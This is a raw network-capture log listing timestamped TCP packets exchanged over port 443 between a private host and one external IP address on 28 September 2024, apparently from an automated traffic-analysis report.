Sep 28, 2024 05:23:46.796015024 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.796031952 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.796037912 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.796055079 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.796056986 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.796113968 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.796118021 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.796118021 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.796124935 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.796148062 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.796160936 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.796168089 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.796189070 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.796195984 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.796200037 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.796209097 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.796215057 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.796252012 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.796268940 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.799326897 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.799386978 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.799474001 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.799516916 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.799520016 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.799530029 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.799556017 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.799571991 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.799582005 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.799587011 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.799608946 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.799621105 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.799685955 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.799724102 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.799773932 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.799773932 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.799781084 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.799873114 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.881597042 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.881647110 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.881664991 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.881681919 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.881711006 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.881730080 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.881823063 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.881858110 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.881881952 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.881886959 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.881907940 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.881928921 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.882179976 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.882201910 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.882227898 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.882232904 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.882261992 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.882280111 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.882379055 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.882414103 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.882433891 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.882438898 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.882471085 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.882483959 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.882688046 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.882708073 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.882751942 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.882756948 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.882781029 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.882805109 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.882922888 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.882936954 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.882973909 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.882978916 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.883013010 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.883032084 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.883235931 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.883249998 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.883291960 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.883296967 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.883330107 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.883342981 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.883481979 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.883497953 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.883563042 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.883568048 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.883610010 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.968595982 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.968624115 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.968677998 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.968709946 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.968734026 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.968760014 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.968885899 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.968907118 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.968936920 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.968943119 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.968971014 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.968987942 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.969124079 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.969187021 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.969201088 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.969206095 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.969244003 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.969249964 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.969388962 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.969409943 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.969439030 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.969446898 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.969471931 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.969491005 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.969681978 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.969713926 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.969738007 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.969743013 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.969778061 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.969786882 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.970029116 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.970046997 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.970088959 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.970094919 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.970117092 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.970124960 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.970287085 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.970326900 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.970352888 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.970359087 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.970387936 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.970406055 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.970503092 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.970535994 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.970563889 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.970568895 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.970602989 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.970619917 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.055418015 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.055443048 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.055501938 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.055532932 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.055552959 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.055569887 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.055708885 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.055727005 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.055757999 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.055767059 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.055784941 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.055799007 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.055944920 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.055959940 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.055986881 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.055994034 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.056016922 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.056035042 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.056138039 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.056154013 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.056183100 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.056188107 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.056211948 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.056229115 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.056484938 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.056502104 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.056548119 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.056555986 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.056576967 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.056592941 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.056741953 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.056756020 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.056797981 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.056804895 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.056835890 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.057123899 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.057143927 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.057173014 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.057178974 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.057204008 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.057218075 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.057363987 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.057379007 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.057415009 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.057423115 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.057445049 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.057461977 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.142373085 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.142407894 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.142451048 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.142482996 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.142494917 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.142522097 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.142613888 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.142632961 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.142658949 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.142667055 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.142684937 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.142709970 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.142857075 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.142870903 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.142901897 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.142910004 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.142937899 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.142944098 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.143110991 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.143130064 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.143155098 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.143161058 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.143183947 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.143201113 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.143469095 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.143485069 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.143510103 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.143517017 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.143543959 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.143559933 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.144062996 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.144078016 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.144103050 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.144109964 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.144135952 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.144148111 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.144292116 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.144315004 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.144340992 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.144345999 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.144375086 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.144387960 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.144567013 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.144584894 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.144608974 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.144614935 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.144648075 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.144664049 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.229300022 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.229320049 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.229372025 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.229384899 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.229408979 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.229430914 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.229604959 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.229619026 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.229650021 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.229659081 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.229679108 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.229696989 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.230051041 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.230065107 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.230096102 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.230103016 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.230125904 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.230143070 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.230354071 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.230370998 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.230397940 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.230405092 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.230424881 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.230443001 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.230535984 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.230551004 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.230595112 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.230603933 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.230638027 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.230932951 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.230951071 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.230978012 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.230986118 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.231010914 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.231031895 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.231220961 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.231236935 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.231266975 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.231272936 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.231296062 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.231312037 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.231503963 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.231518984 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.231563091 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.231570005 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.231591940 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.231609106 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.316299915 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.316323996 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.316461086 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.316487074 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.316524982 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.316662073 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.316680908 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.316720009 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.316725969 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.316754103 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.316773891 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.316879034 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.316895008 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.316946983 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.316953897 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.316988945 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.317189932 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.317203999 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.317243099 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.317255020 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.317297935 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.317492962 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.317517042 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.317539930 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.317545891 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.317579985 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.317595005 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.317879915 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.317899942 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.317931890 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.317940950 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.317962885 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.317981005 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.318276882 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.318304062 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.318325043 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.318331003 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.318357944 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.318378925 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.318568945 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.318610907 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.318619013 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.318624020 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.318651915 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.318670988 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.403331041 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.403352976 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.403415918 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.403440952 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.403479099 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.403543949 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.403559923 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.403584957 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.403592110 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.403613091 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.403645992 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.403824091 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.403839111 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.403872967 CEST	49739	443	192.168.2.6	172.67.167.90
